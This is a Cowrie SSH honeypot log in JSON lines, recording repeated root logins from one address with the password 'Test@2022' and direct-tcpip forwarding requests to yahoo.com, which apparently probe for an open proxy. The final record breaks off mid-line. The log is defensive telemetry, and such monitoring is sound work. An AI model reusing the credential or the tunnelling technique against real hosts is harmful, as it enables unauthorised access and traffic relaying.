{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.907977Z","src_ip":"213.209.150.239","session":"93914c998f00"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.955144Z","src_ip":"213.209.150.239","session":"93914c998f00"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.191161Z","src_ip":"213.209.150.239","session":"93914c998f00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":6935,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6935","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.239753Z","session":"93914c998f00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.286989Z","src_ip":"213.209.150.239","session":"93914c998f00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":16575,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16575","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.421557Z","session":"93914c998f00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.468721Z","src_ip":"213.209.150.239","session":"93914c998f00"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.516694Z","src_ip":"213.209.150.239","session":"93914c998f00"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64829,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f49d96f22cb","protocol":"ssh","message":"New connection: 213.209.150.239:64829 (1.2.3.4:22) [session: 2f49d96f22cb]","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.572519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.573698Z","src_ip":"213.209.150.239","session":"2f49d96f22cb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.630605Z","src_ip":"213.209.150.239","session":"2f49d96f22cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.913223Z","src_ip":"213.209.150.239","session":"2f49d96f22cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":5857,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5857","sensor":"my-vps","timestamp":"2025-08-26T00:58:36.970809Z","session":"2f49d96f22cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.027993Z","src_ip":"213.209.150.239","session":"2f49d96f22cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":26581,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26581","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.183098Z","session":"2f49d96f22cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.240056Z","src_ip":"213.209.150.239","session":"2f49d96f22cb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.297659Z","src_ip":"213.209.150.239","session":"2f49d96f22cb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64886,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f58185d3289","protocol":"ssh","message":"New connection: 213.209.150.239:64886 (1.2.3.4:22) [session: 0f58185d3289]","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.343610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.344486Z","src_ip":"213.209.150.239","session":"0f58185d3289"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.391538Z","src_ip":"213.209.150.239","session":"0f58185d3289"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.625903Z","src_ip":"213.209.150.239","session":"0f58185d3289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26772,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26772","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.673661Z","session":"0f58185d3289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.720686Z","src_ip":"213.209.150.239","session":"0f58185d3289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28037,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28037","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.857341Z","session":"0f58185d3289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.905614Z","src_ip":"213.209.150.239","session":"0f58185d3289"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:37.953794Z","src_ip":"213.209.150.239","session":"0f58185d3289"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64940,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a690c85a431","protocol":"ssh","message":"New connection: 213.209.150.239:64940 (1.2.3.4:22) [session: 5a690c85a431]","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.009752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.010481Z","src_ip":"213.209.150.239","session":"5a690c85a431"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.067238Z","src_ip":"213.209.150.239","session":"5a690c85a431"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.349755Z","src_ip":"213.209.150.239","session":"5a690c85a431"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17007,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17007","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.407199Z","session":"5a690c85a431"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.465344Z","src_ip":"213.209.150.239","session":"5a690c85a431"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10029,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10029","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.619131Z","session":"5a690c85a431"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.675764Z","src_ip":"213.209.150.239","session":"5a690c85a431"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.733315Z","src_ip":"213.209.150.239","session":"5a690c85a431"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64999,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a48fcfe15a6","protocol":"ssh","message":"New connection: 213.209.150.239:64999 (1.2.3.4:22) [session: 9a48fcfe15a6]","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.779584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.780326Z","src_ip":"213.209.150.239","session":"9a48fcfe15a6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:38.827820Z","src_ip":"213.209.150.239","session":"9a48fcfe15a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.063568Z","src_ip":"213.209.150.239","session":"9a48fcfe15a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":16091,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:16091","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.112229Z","session":"9a48fcfe15a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.159453Z","src_ip":"213.209.150.239","session":"9a48fcfe15a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28052,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28052","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.297543Z","session":"9a48fcfe15a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.344818Z","src_ip":"213.209.150.239","session":"9a48fcfe15a6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.392890Z","src_ip":"213.209.150.239","session":"9a48fcfe15a6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1067,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a8852ec6262","protocol":"ssh","message":"New connection: 213.209.150.239:1067 (1.2.3.4:22) [session: 5a8852ec6262]","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.448639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.449826Z","src_ip":"213.209.150.239","session":"5a8852ec6262"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac